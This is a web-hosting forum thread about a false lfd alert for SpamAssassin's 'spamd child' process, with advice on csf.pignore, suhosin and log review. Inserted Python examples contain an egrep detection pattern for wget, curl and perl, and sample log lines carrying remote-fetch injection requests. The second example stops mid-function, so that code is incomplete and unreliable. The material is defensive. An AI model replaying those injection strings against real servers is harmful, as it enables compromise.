  1. #1
    Join Date
    Aug 2009
    Posts
    43

    Suspicious Process Running under user in my host.. What should I do?

    Suspicious Process Running under user in my host
    Time: Fri Sep 11 11:34:27 2009 +0700
    PID: 20893
    Account: belidonk
    Uptime: 1146 seconds


    Executable:

    /usr/local/bin/perl


    Command Line (often faked in exploits):

    spamd child


    Network connections by the process (if any):

    tcp: 127.0.0.1:783 -> 0.0.0.0:0
    tcp: 127.0.0.1:783 -> 127.0.0.1:33537
    udp: 202.43.169.146:40156 -> 202.43.169.146:53


    Files open by the process (if any):

    /dev/null
    /dev/null
    /dev/null
    /usr/bin/spamd
    /usr/lib/perl5/site_perl/5.8.8/Mail/SpamAssassin/Plugin/VBounce.pm
    /tmp/.spamassassin20893VJRkFEtmp
    /tmp/.spamassassin208932TMd9Ktmp


    Memory maps by the process (if any):

    005aa000-0069e000 r-xp 00000000 fd:00 26804459 /lib/libdb-4.3.so
    0069e000-006a1000 rwxp 000f3000 fd:00 26804459 /lib/libdb-4.3.so
    0089b000-0089d000 r-xp 00000000 fd:00 26805617 /lib/libutil-2.5.so
    0089d000-0089e000 r-xp 00001000 fd:00 26805617 /lib/libutil-2.5.so
    0089e000-0089f000 rwxp 00002000 fd:00 26805617 /lib/libutil-2.5.so
    00b3e000-00b58000 r-xp 00000000 fd:00 26805086 /lib/ld-2.5.so
    00b58000-00b59000 r-xp 00019000 fd:00 26805086 /lib/ld-2.5.so
    00b59000-00b5a000 rwxp 0001a000 fd:00 26805086 /lib/ld-2.5.so
    00b5c000-00c9a000 r-xp 00000000 fd:00 26805104 /lib/libc-2.5.so
    00c9a000-00c9c000 r-xp 0013e000 fd:00 26805104 /lib/libc-2.5.so
    00c9c000-00c9d000 rwxp 00140000 fd:00 26805104 /lib/libc-2.5.so
    00c9d000-00ca0000 rwxp 00c9d000 00:00 0
    00ca2000-00ca4000 r-xp 00000000 fd:00 26805105 /lib/libdl-2.5.so
    00ca4000-00ca5000 r-xp 00001000 fd:00 26805105 /lib/libdl-2.5.so
    00ca5000-00ca6000 rwxp 00002000 fd:00 26805105 /lib/libdl-2.5.so
    00ca8000-00cbb000 r-xp 00000000 fd:00 26805566 /lib/libpthread-2.5.so
    00cbb000-00cbc000 r-xp 00012000 fd:00 26805566 /lib/libpthread-2.5.so
    00cbc000-00cbd000 rwxp 00013000 fd:00 26805566 /lib/libpthread-2.5.so
    00cbd000-00cbf000 rwxp 00cbd000 00:00 0
    00cc1000-00ce6000 r-xp 00000000 fd:00 26805573 /lib/libm-2.5.so
    00ce6000-00ce7000 r-xp 00024000 fd:00 26805573 /lib/libm-2.5.so
    00ce7000-00ce8000 rwxp 00025000 fd:00 26805573 /lib/libm-2.5.so
    00d61000-00d68000 r-xp 00000000 fd:00 26805604 /lib/librt-2.5.so
    00d68000-00d69000 r-xp 00006000 fd:00 26805604 /lib/librt-2.5.so
    00d69000-00d6a000 rwxp 00007000 fd:00 26805604 /lib/librt-2.5.so
    00d6c000-00d7f000 r-xp 00000000 fd:00 26805599 /lib/libnsl-2.5.so
    00d7f000-00d80000 r-xp 00012000 fd:00 26805599 /lib/libnsl-2.5.so
    00d80000-00d81000 rwxp 00013000 fd:00 26805599 /lib/libnsl-2.5.so
    00d81000-00d83000 rwxp 00d81000 00:00 0
    00d85000-00d8e000 r-xp 00000000 fd:00 26805593 /lib/libcrypt-2.5.so
    00d8e000-00d8f000 r-xp 00008000 fd:00 26805593 /lib/libcrypt-2.5.so
    00d8f000-00d90000 rwxp 00009000 fd:00 26805593 /lib/libcrypt-2.5.so
    00d90000-00db7000 rwxp 00d90000 00:00 0
    08048000-08126000 r-xp 00000000 fd:00 59322714 /usr/local/bin/perl
    08126000-0812a000 rwxp 000dd000 fd:00 59322714 /usr/local/bin/perl
    0812a000-0812c000 rwxp 0812a000 00:00 0
    0835f000-0a2cc000 rwxp 0835f000 00:00 0 [heap]
    b76ee000-b77af000 rwxp b76ee000 00:00 0
    b7870000-b7931000 rwxp b7d4c000 00:00 0
    b7931000-b79f2000 rwxp b7931000 00:00 0
    b79f2000-b7ab3000 rwxp b7ea2000 00:00 0
    b7b4b000-b7d4c000 rwxp b7b4b000 00:00 0
    b7df7000-b7ea2000 rwxp b7df7000 00:00 0
    b7f4d000-b7f52000 r-xp 00000000 fd:00 60032680 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/NetAddr/IP/Util/Util.so
    b7f52000-b7f53000 rwxp 00004000 fd:00 60032680 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/NetAddr/IP/Util/Util.so
    b7f53000-b7f58000 r-xp 00000000 fd:00 59908663 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/version/vxs/vxs.so
    b7f58000-b7f59000 rwxp 00004000 fd:00 59908663 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/version/vxs/vxs.so
    b7f59000-b7f63000 r-xp 00000000 fd:00 59871844 /usr/local/lib/perl5/5.8.8/i686-linux/auto/DB_File/DB_File.so
    b7f63000-b7f64000 rwxp 00009000 fd:00 59871844 /usr/local/lib/perl5/5.8.8/i686-linux/auto/DB_File/DB_File.so
    b7f64000-b7f6d000 r-xp 00000000 fd:00 26804490 /lib/libnss_files-2.5.so
    b7f6d000-b7f6e000 r-xp 00008000 fd:00 26804490 /lib/libnss_files-2.5.so
    b7f6e000-b7f6f000 rwxp 00009000 fd:00 26804490 /lib/libnss_files-2.5.so
    b7f71000-b7f74000 r-xp 00000000 fd:00 59906292 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/BSD/Resource/Resource.so
    b7f74000-b7f75000 rwxp 00002000 fd:00 59906292 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/BSD/Resource/Resource.so
    b7f75000-b7f79000 r-xp 00000000 fd:00 60032556 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Digest/SHA1/SHA1.so
    b7f79000-b7f7a000 rwxp 00003000 fd:00 60032556 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Digest/SHA1/SHA1.so
    b7f7a000-b7f7d000 r-xp 00000000 fd:00 59871555 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Sys/Syslog/Syslog.so
    b7f7d000-b7f7e000 rwxp 00002000 fd:00 59871555 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Sys/Syslog/Syslog.so
    b7f7e000-b7f83000 r-xp 00000000 fd:00 59871947 /usr/local/lib/perl5/5.8.8/i686-linux/auto/List/Util/Util.so
    b7f83000-b7f84000 rwxp 00004000 fd:00 59871947 /usr/local/lib/perl5/5.8.8/i686-linux/auto/List/Util/Util.so
    b7f84000-b7f86000 r-xp 00000000 fd:00 59872383 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Cwd/Cwd.so
    b7f86000-b7f87000 rwxp 00001000 fd:00 59872383 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Cwd/Cwd.so
    b7f87000-b7f88000 r-xp 00000000 fd:00 60032568 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Net/DNS/DNS.so
    b7f88000-b7f89000 rwxp 00001000 fd:00 60032568 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Net/DNS/DNS.so
    b7f89000-b7f92000 r-xp 00000000 fd:00 60031986 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/HTML/Parser/Parser.so
    b7f92000-b7f93000 rwxp 00008000 fd:00 60031986 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/HTML/Parser/Parser.so
    b7f93000-b7f97000 r-xp 00000000 fd:00 59872354 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Time/HiRes/HiRes.so
    b7f97000-b7f98000 rwxp 00003000 fd:00 59872354 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Time/HiRes/HiRes.so
    b7f98000-b7f9b000 r-xp 00000000 fd:00 59871569 /usr/local/lib/perl5/5.8.8/i686-linux/auto/File/Glob/Glob.so
    b7f9b000-b7f9c000 rwxp 00002000 fd:00 59871569 /usr/local/lib/perl5/5.8.8/i686-linux/auto/File/Glob/Glob.so
    b7f9c000-b7f9e000 r-xp 00000000 fd:00 59871799 /usr/local/lib/perl5/5.8.8/i686-linux/auto/MIME/Base64/Base64.so
    b7f9e000-b7f9f000 rwxp 00001000 fd:00 59871799 /usr/local/lib/perl5/5.8.8/i686-linux/auto/MIME/Base64/Base64.so
    b7f9f000-b7fb5000 r-xp 00000000 fd:00 59871742 /usr/local/lib/perl5/5.8.8/i686-linux/auto/POSIX/POSIX.so
    b7fb5000-b7fb6000 rwxp 00015000 fd:00 59871742 /usr/local/lib/perl5/5.8.8/i686-linux/auto/POSIX/POSIX.so
    b7fb6000-b7fb9000 r-xp 00000000 fd:00 59871596 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Fcntl/Fcntl.so
    b7fb9000-b7fba000 rwxp 00002000 fd:00 59871596 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Fcntl/Fcntl.so
    b7fba000-b7fbe000 r-xp 00000000 fd:00 60164505 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Socket6/Socket6.so
    b7fbe000-b7fbf000 rwxp 00003000 fd:00 60164505 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Socket6/Socket6.so
    b7fbf000-b7fc2000 rwxp b7fbf000 00:00 0
    b7fc2000-b7fc3000 r-xp 00000000 fd:00 59871558 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Sys/Hostname/Hostname.so
    b7fc3000-b7fc4000 rwxp 00000000 fd:00 59871558 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Sys/Hostname/Hostname.so
    b7fc4000-b7fc7000 r-xp 00000000 fd:00 59872379 /usr/local/lib/perl5/5.8.8/i686-linux/auto/IO/IO.so
    b7fc7000-b7fc8000 rwxp 00002000 fd:00 59872379 /usr/local/lib/perl5/5.8.8/i686-linux/auto/IO/IO.so
    b7fc8000-b7fcc000 r-xp 00000000 fd:00 59871524 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Socket/Socket.so
    b7fcc000-b7fcd000 rwxp 00003000 fd:00 59871524 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Socket/Socket.so
    b7fcd000-b7fce000 r-xp b7fcd000 00:00 0 [vdso]
    bfba5000-bfbd3000 rw-p bffd1000 00:00 0 [stack]

    Guys, any idea what I should do? I have killed the PID.
    Thank you

  2. #2
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    1,932
    I wouldn't suggest killing processes you don't know anything about. Research the process and then decide whether it is harmful or not.
    -Joe @ Secure Dragon LLC.
    + OpenVZ Powered by Wyvern | KVM | cPanel Hosting | Backup VPSs | LowEndBoxes | DDOS Protection
    + Florida | Colorado | Illinois | California | Oregon | Georgia | New Jersey | Arizona | Texas

  3. #3
    Join Date
    Aug 2009
    Posts
    43
    FYI, the user (belidonk) has been reported and logged as using a large number of resources on my host. When I confirmed it with the account owner, he said he is doing nothing. So I assumed that there is something wrong with this user: maybe he got attacked by someone, or a trojan, or anything else that I might not know about. Because their main page index.php got changed by someone and cannot load correctly (he said "I never changed the index.php.. then who did it?"). How do I avoid this happening again?

    thanks

  4. #4
    Looks like some hidden perl script. Have you gone through the /tmp partition? There might be some sort of perl udp or tcp scripts running.
    www.24x7servermanagement.com
    Server Management, Server Security, Server Monitoring.
    India's Leading Managed Service Provider !! Skype: techs24x7

  5. #5
    Join Date
    Aug 2009
    Posts
    43
    How do I check it? This is my /tmp directory listing:
    ./ sess_34a7c0f1ef1bdd25a6e455a44e5912a7 sess_6c50ae8f68334982c015a28bc8616b0c sess_b434340698a515c0325ed437207aa65f
    ../ sess_34f25b2fb8e3aac7d385df4eaa9d30ec sess_6d078054c2d7afd274c5b6d5468e6e44 sess_baaf49fa46fd3c5c42ea6a7891e3b530
    aquota.user* sess_36c96c180280a43529c95533c3e59ba6 sess_6d571ab46642ab39b797ebe37d85633b sess_baed918ee6b1c7b23c58f59a8221f0aa
    eaccelerator/ sess_3933f6854dd3bfadce371389786aa9f6 sess_6de0879e67806e44e51f0fed8ffab7c0 sess_bb6c06dd5b9b68e913c4c701b4a62bc4
    .ftpquota sess_3ee555d1123049951f86cd2ef600ab6c sess_726eda76a4e554b18611782a38dfaaa3 sess_bbc57d5e1fbeb692c6f332d376e1918f
    .ICE-unix/ sess_3f9cdf05c01e0d2b066ffed8c6be23b4 sess_7558c8d3e5fdb060e1c482c1b0a9d4f2 sess_be8c1cf42e51099b271d82d010f5ed70
    lost+found/ sess_3fca2ac9e59f769c8acffd74dba418a6 sess_763a027cdc44c5dfe8477f17e0aae3cb sess_bef5ed6a3b892436d812d20bfcceed1f
    magento/ sess_40f719b447c35cb2a4bbeda6e301dfe6 sess_76a65e26df35a91211df7cb6e15e5eb4 sess_cc14e72096d9e6ccbaaa2c890a80aee5
    mysql.sock@ sess_4542c1a0ddb04db3dfa16e906cfaf6a6 sess_7a2400244a14f32152448051d768cc7e sess_d2cae73088f36ee6c65cd383528b1b63
    sess_0004190eb64b38a64eaf9362581ddbc4 sess_485e288d5e0830a43633dc59a0765e97 sess_7d5b4e1507ec6e1dcd0092fcf841b76c sess_da1b92360d746c38a2819f83316390a8
    sess_0411e281e0c6c1fdde85e688351fec24 sess_4de98c80929502a2ca5e41c1d2c08ed1 sess_834ae75e49f694b105a553ccc94eb8e1 sess_e027443070e95a692dfc9fb297121d54
    sess_05ca1505ef5d49ecba81b7ed2c01c746 sess_4e07b6fca44416f36a903e46d86a2fcf sess_83d709182a7b6324681a8d77a2ad1aae sess_e33c2d687071a2f71d26c0f78c04fb54
    sess_0652341e1b32a08cbb82ec1977351b7c sess_4ea85373388e404f23ef4ee6318eb8af sess_862a315245c6961d3e5baf4b8b831bd7 sess_e3cb89fa4da71f0f0d887048dee06b2a
    sess_0a4f15193be207987dbfac61db6af4e4 sess_51ec5ffcd6edd7a9fa29db7c6496cf39 sess_8778a0093f45d39a6c04107006d437fd sess_e5f55b2687bc2fc77a1ce0073684a7ad
    sess_0c277461a39d5c9af7419d4f5a0570d5 sess_52d03e7c809be9f4dce4c0e632ceac35 sess_87d38230dd1e31994029aa90b53b80ef sess_e683bba7a4b2796cc137738f4030bef2
    sess_0f818387334ee2d4a09753db74e56d77 sess_54a3df8eb051f811021ec470a7d1a68c sess_8e2ae714880e12f112bb3c9105c032a3 sess_e809faadd61b4ac28a797ad453d083e7
    sess_16681bfa71946a90630e18938cc54beb sess_5528e14550a1664d1808804e93f5711c sess_911faeac150401a326d8e3030ffa6d73 sess_ea8bbe0982fa02622b88b1a38d042573
    sess_18eae94f67bfa5fb083929c148402ff0 sess_560dade8c165201562a4e70558fc36c2 sess_97c0a55252ff0254bd5e6b971cd025fb sess_ed3110e43f7e2547e371cc23fd4ab248
    sess_1a98ba045f7a47d3d899750310717337 sess_57489107e5d135f7a7d7741008a3ca18 sess_9d44f778040cb5d299296263682e8c36 sess_eed780d854e8d81908840e30aa7a14f5
    sess_1c3ea3cdccf73ae6756540910c6d6576 sess_5939302be1a6dac364c6a2c130056e89 sess_9d6a751819858bfa128f0f9f857f45c8 sess_eeee4b7b335cec45cc886db8a2937930
    sess_1c5528334e4466c5be9016f23e7e13c8 sess_5a294933a9b8c40e1a8089fc5f96f609 sess_a3d9479d82e4976e08000bc31032aeb7 sess_f1bf4a9b09c788eec9fecbfacdf04611
    sess_1d3c6fad43b4f4d4a81c28c691b5b08d sess_5af3f35e6596df9cbc62379976c41f3f sess_a52838e3d6128f7d921c9a04a971a3f5 sess_f9918d8a5d6202a8bfe4399ddee71a54
    sess_1d5c1d38e282c8352ff84d0be441f43a sess_5cdad968000d602ab38c51d181c28a8b sess_ae91f891e41daec731f6ca574b5a1001 sess_f9cfd9619fca037b6fa78d97053b1517
    sess_2589f8660e314efc68b2960ebc6e6333 sess_5dae9429762c09a3c77467faf0c98b65 sess_afb048d26a4a03c818dbd92257ce98b5 sess_fb0b3ac04acc4af84d1665b1a51e2c66
    sess_2c5e746502114d87a8814c159688807b sess_61f6dcfbed52a4bd0e497d5f62178dc3 sess_b0e2fb36bc0cde124833c9adb0e93db8 .s.PGSQL.5432=
    sess_2cdbaf686a823bea446aff7897500173 sess_64448e80d90a19c8a2d903f82a803fd3 sess_b17203eaf1c6f5228afd9e122ce4c9b1 .s.PGSQL.5432.lock
    sess_2f3b60d24657679f9b0b2323f93604ee sess_67d6c241c3bfa747010821698ee8ba63 sess_b177a876f2eb001c17a6f185e81f1087

  6. #6
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    1,932
    The process running is spamd which is the SpamAssassin service. It has nothing to do with the user since it can only be enabled by the server admin.

  7. #7
    Looks fine, no problem with /tmp.

  8. #8
    Join Date
    Aug 2009
    Posts
    43
    Don't you think this is strange..
    When I do a ps to see all processes for each user on my host,
    only user belidonk shows something different.

    Here are just a couple of accounts on my host. But I do it for all accounts, with the assumption that all accounts are using pop3 right now, webmail, have been accessed by internet users, etc.
    root@fire [/tmp]# ps -a -u o****
    PID TTY TIME CMD
    667 pts/0 00:00:00 ps
    root@fire [/tmp]# ps -a -u belidonk
    PID TTY TIME CMD
    829 pts/0 00:00:00 ps
    15224 ? 00:00:04 imapd
    26558 ? 00:00:00 pop3d
    71238 ? 00:00:00 gam_server
    root@fire [/tmp]# ps -a -u b****
    PID TTY TIME CMD
    844 pts/0 00:00:00 ps
    root@fire [/tmp]# ps -a -u a******
    PID TTY TIME CMD
    933 pts/0 00:00:00 ps

    Why does belidonk show gam_server, pop3d, imapd? The belidonk user told me that he just runs a usual php script.. nothing to do with gam_server, etc.. Please, some advice?

  9. #9
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    1,932
    Do some research on these services, you'll notice they are typical services for any website. This is not strange and nothing is out of the ordinary. You, like most of us, have received a false alarm from LFD.

  10. #10
    Join Date
    Jun 2003
    Location
    World Wide Web
    Posts
    581
    You need to edit csf.pignore to filter out legitimate processes; otherwise any user process that exceeds the time you have set up will cause LFD to flag the process as suspicious.

    If you want to ignore them you'll need to add something like the following to csf.pignore and then restart lfd:

    cmd : spamd child

    The above is one of the methods used, although I won't suggest it, as they're not always false positives.

    Searching through /usr/local/apache/domlogs/ should help you find out if there were any hack attempts. If any vulnerable scripts are found, I'd suggest chmodding them to 000 and chowning them to root so they won't run.

    You should also go for PHP securing by applying suhosin. You might as well run the /scripts/securetmp script (for cPanel servers) just for security.

    I would advise hiring a professional to fix this for you and also to harden your server's security. You should manually examine /tmp to see if there are any vulnerable scripts uploaded.
    SupportExpertz.com - the name says it all!
    Managed Cloud Servers
    Server Management and Monitoring
    24x7 outsourced customer support

  11. #11
    Join Date
    Aug 2009
    Posts
    43
    Hmm.. maybe that is right.. I should harden my server. Can you give me a step-by-step guide to applying suhosin or phpsuexec to my existing clients? Because until now, I haven't set it up. I read a couple of articles related to it.. They said that by using phpsuexec or suhosin, my clients will have problems with mail setting permissions, etc.. Is it true? Please give me advice for hardening my server (some links, articles, files, or anything, but step by step, because I'm new in this area)?

    Hmm.. as for hiring a professional, I think that's a good idea. But for now, I want to do it by myself so I can be as good as a professional too.
    Thanks for the advice.

  12. #12
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    1,932
    Well, since you appear to have already bypassed the basic steps for securing your server, as well as killed a system process without knowing what it is, I would suggest leaving the security to people who know what they are doing to avoid a "HELP ME" thread in the near distant future.

    If you're not willing to shell out a couple of dollars to ensure your clients' security then my advice is to find a different line of work where people don't put their potential livelihood in your hands.

  13. #13
    Join Date
    Aug 2009
    Posts
    43
    Hi,
    I get this in my /usr/local/apache/domlogs/:
    belidonk/
    |-- ftp.domainname.com-ftp_log
    |-- domainname.com
    `-- domainname.com-ssl_log
    belidonk-imapbytes_log
    belidonk-imapbytes_log.offset
    belidonk-popbytes_log
    belidonk-popbytes_log.offset

    Which one should I check? And how do I mark it as a hack attempt?

  14. #14
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    1,932
    Hire a professional. If you don't know which logs to even look in then chances are you don't know what you are looking for nor will you know how to properly fix the issue.

  15. #15
    Join Date
    Aug 2009
    Posts
    43
    @JWeb2:
    Sorry, no offense, JWeb2.. But I think this is what the forum was created for..
    to help each other and post information related to the questions.
    If everything can be answered with the statement "Hire a Pro".. then what does a pro do if he/she gets stuck on one issue?

    thank you.

  16. #16
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    1,932
    Yes, but when you start to kill system processes without any knowledge and target a user for checking their e-mail, then it's time to call a pro to save yourself a lot more time and money in the future.

  17. #17
    Join Date
    Aug 2009
    Posts
    43
    @JWeb2:
    Okay.. thanks for the input. Appreciate that.

  18. #18
    Join Date
    Jun 2003
    Location
    World Wide Web
    Posts
    581
    Quote Originally Posted by queen_leonia
    Hi,
    I get this in my /usr/local/apache/domlogs/:
    belidonk/
    |-- ftp.domainname.com-ftp_log
    |-- domainname.com
    `-- domainname.com-ssl_log
    belidonk-imapbytes_log
    belidonk-imapbytes_log.offset
    belidonk-popbytes_log
    belidonk-popbytes_log.offset

    Which one should I check? And how do I mark it as a hack attempt?

    You can check the file domainname.com (that should be your domain name). Well, to know if there were any hacking attempts, you should check manually and be able to find out. This is a simple script that can be used to see if the entries exist:

    find /usr/local/apache/domlogs/your_domain_name -exec egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)' {} \;

    You can enable suhosin from cPanel's EasyApache, i.e. /scripts/easyapache (never run the script if you haven't before).

    If you use suhosin in cPanel's EasyApache you might run into issues where you cannot post a large number of variables to a php script. But you may easily solve this by tweaking the suhosin variables in php.ini.
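The egrep in the post above prints any domlog line that merely contains one of those strings, so "cd" inside "/cdn/" or "touch" inside "/touchscreen/" comes back as noise. Below is an added example, not code from the thread or from any poster, of the same search done from a defender's side in Python: it parses each log line, looks at the request field only, matches the command names as whole tokens, and reports which names hit. The log lines, hosts and paths in SAMPLE_LOG are constructed for this example.

```python
"""Added example: scan Apache domlog lines for the command names the post
greps for, matched as whole tokens inside the request field, and report
which token matched. Sample log lines below are constructed, not real."""
import re

# Command names from the egrep in the post above.
SUSPECT_WORDS = ("wget", "curl", "lynx", "gcc", "perl", "sh", "cd", "mkdir", "touch")

# Common/combined log format: host ident user [time] "request" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3})'
)

# The post's pattern as written: a bare substring match anywhere in the line.
NAIVE_RE = re.compile("|".join(SUSPECT_WORDS), re.IGNORECASE)

# Stricter form: the word must stand on its own, bounded by characters that are
# not letters, digits or '_' (so '/', '=', ';', '%' and whitespace all count).
TOKEN_RE = re.compile(
    r"(?<![A-Za-z0-9_])(" + "|".join(SUSPECT_WORDS) + r")(?![A-Za-z0-9_])",
    re.IGNORECASE,
)

# Constructed sample log (documentation-range addresses), not taken from any server.
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Sep/2009:11:20:01 +0700] "GET /cdn/style.css HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Sep/2009:11:20:02 +0700] "GET /touchscreen/index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Sep/2009:11:31:10 +0700] "GET /index.php?page=http://203.0.113.9/x.txt&c=wget%20http://203.0.113.9/x.pl HTTP/1.1" 200 3310 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Sep/2009:11:31:12 +0700] "GET /index.php?c=cd%20/tmp;perl%20x.pl HTTP/1.1" 200 221 "-" "Mozilla/5.0"',
    '198.51.100.22 - - [11/Sep/2009:11:40:00 +0700] "POST /admin/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]


def naive_hits(lines):
    """Lines the post's egrep would print (substring match, any field)."""
    return [ln for ln in lines if NAIVE_RE.search(ln)]


def scan(lines):
    """Return (host, time, request, [matched words]) for every line whose
    request field contains at least one suspect command name as a whole token.
    Lines that are not in common log format are skipped."""
    hits = []
    for ln in lines:
        m = LOG_RE.match(ln)
        if not m:
            continue
        req = m.group("request")
        words = sorted({w.lower() for w in TOKEN_RE.findall(req)})
        if words:
            hits.append((m.group("host"), m.group("time"), req, words))
    return hits


if __name__ == "__main__":
    print("egrep-style hits:", len(naive_hits(SAMPLE_LOG)))
    for host, when, req, words in scan(SAMPLE_LOG):
        print(when, host, words, req)
```

On the constructed sample the substring search flags four of the five lines, the token search flags only the two requests that actually carry a command name, and it tells the admin which name matched so the hit can be checked against the script named in the request. Reading the log rather than grepping it also means the match is confined to the request field, so a user-agent string cannot trigger it.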

  19. #19
    Join Date
    Jun 2003
    Location
    World Wide Web
    Posts
    581
    You can google for "Basic Linux Server Security", which should provide you with good links on how to secure Linux, even with step-by-step details.

  20. #20
    Join Date
    Aug 2009
    Posts
    43
    @logicsupport:
    Thanks for the information and the answer.

  21. #21
    Join Date
    Aug 2009
    Posts
    43
    Here is what I found in the CSF forum..
    Process Tracking and csf.pignore

    --------------------------------------------------------------------------------

    1. If you're seeing spamd being reported after the latest update and want to ignore it, the following can be added to csf.pignore:

    cmd: spamd child

    Then restart lfd.

    2. If you're seeing awstats.pl being reported after the latest update and want to ignore it, the following can be added to csf.pignore:

    pcmd:.*/usr/local/cpanel/3rdparty/bin/awstats\.pl.*
    pcmd:.*/usr/local/cpanel/base/awstats\.pl.*

    Then restart lfd.

    3. If you're seeing (deleted) processes being reported then you need to read the information provided in csf.conf for the PT_DELETED option. Currently this reads:

    Quote:
    # lfd will report processes, even if they're listed in csf.pignore, if they're
    # tagged as (deleted) by Linux. This information is provided in Linux under
    # /proc/PID/exe. A (deleted) process is one that is running a binary that has
    # the inode for the file removed from the file system directory. This usually
    # happens when the binary has been replaced due to an upgrade for it by the OS
    # vendor or another third party (e.g. cPanel). You need to investigate whether
    # this is indeed the case to be sure that the original binary has not been
    # replaced by a rootkit or is running an exploit.
    #
    # To stop lfd reporting such process you need to restart the daemon to which it
    # belongs and therefore run the process using the replacement binary (presuming
    # one exists). This will normally mean running the associated startup script in
    # /etc/init.d/
    #
    # If you don't want lfd to report deleted binary processes, set to 0
    PT_DELETED = "1"

    If, for example, you still want to ignore pure-ftpd deleted executable reports, the following can be added to csf.pignore:

    pexe:/usr/sbin/pure-ftpd.*

    or, if you want to ignore deleted executable processes, set the following in csf.conf:

    PT_DELETED = "0"

    In either case, restart lfd after making any changes.

    However, be aware that deleted executable file names will become more corrupted the longer they are left running, so even the pure-ftpd part of the name may no longer match over time. This is a symptom of the Linux file system and the way Linux handles processes that are running executables that no longer exist at the inode they originally ran from, this is simply what lfd is reporting.


    Please note that investigating Process Tracking reports is the responsibility of the server administrator and going into the detail of such work is beyond the scope of this forum. lfd simply reports the information it finds for a process within the /proc/PID/ file system.

    Source: http://forum.configserver.com/showthread.php?t=2059

    But I haven't done it, because I think maybe it's not the real solution.
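Post #10 and the csf forum text quoted above both turn on the same question: given a process record from /proc/PID/, which csf.pignore rule (if any) silences lfd's process-tracking report, and why a "(deleted)" executable is reported even when the original path is listed. The following is an added example written for this thread, not csf's or lfd's own code: a small model of that decision in Python. It uses the rule forms quoted above (cmd:, pcmd:, pexe:) plus csf's other documented forms (exe:, user:, puser:), treats PT_USERTIME and PT_DELETED as plain parameters (both are real csf.conf options; the values used here are illustrative), and reads process records from hand-built objects instead of /proc. That regex rules must match the whole string, and that with PT_DELETED=1 matching is done against the name with its " (deleted)" tag still attached, is this example's reading of the quoted csf.conf text, not a statement about lfd internals.

```python
"""Added example (not csf/lfd code): model lfd's process-tracking decision
against csf.pignore rules and the PT_DELETED switch. Process records are
constructed by hand here instead of being read from /proc/PID/."""
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    user: str
    exe: str       # target of /proc/PID/exe; ends in " (deleted)" when the inode is gone
    cmdline: str   # /proc/PID/cmdline joined with spaces (the part "often faked in exploits")
    uptime: int    # seconds the process has been running


# Rules exactly as quoted in the thread (a raw string keeps the backslash).
PIGNORE_TEXT = r"""
# csf.pignore sample, assembled from the posts above
cmd : spamd child
pcmd:.*/usr/local/cpanel/3rdparty/bin/awstats\.pl.*
"""

# Constructed process records. SPAMD mirrors the report in post #1.
SPAMD = Proc(20893, "belidonk", "/usr/local/bin/perl", "spamd child", 1146)
AWSTATS = Proc(3001, "belidonk", "/usr/bin/perl",
               "/usr/bin/perl /usr/local/cpanel/3rdparty/bin/awstats.pl -config=example", 900)
FTPD = Proc(4002, "ftp", "/usr/sbin/pure-ftpd (deleted)", "pure-ftpd (SERVER)", 5000)
UNKNOWN = Proc(5555, "belidonk", "/usr/local/bin/perl", "/usr/local/bin/perl /tmp/.x.pl", 2000)


def parse_pignore(text):
    """Parse csf.pignore lines into (kind, value) pairs. Blank lines and
    comments are skipped; whitespace around key and value is dropped, so
    'cmd : spamd child' and 'cmd:spamd child' are the same rule."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        kind, value = line.split(":", 1)
        rules.append((kind.strip().lower(), value.strip()))
    return rules


def _matches(rule, proc, exe_name):
    """True if one rule covers the process. Regex forms must match the whole string (assumption)."""
    kind, value = rule
    if kind == "exe":
        return exe_name == value
    if kind == "user":
        return proc.user == value
    if kind == "cmd":
        return proc.cmdline == value
    if kind == "pexe":
        return re.fullmatch(value, exe_name) is not None
    if kind == "puser":
        return re.fullmatch(value, proc.user) is not None
    if kind == "pcmd":
        return re.fullmatch(value, proc.cmdline) is not None
    return False


def report(proc, rules, pt_usertime=600, pt_deleted=1):
    """Return the reason lfd would report this process, or None if it stays quiet.
    pt_usertime: seconds a user process may run before it is examined (illustrative value).
    pt_deleted: 1 = keep the '(deleted)' tag on the name while matching, so an exact
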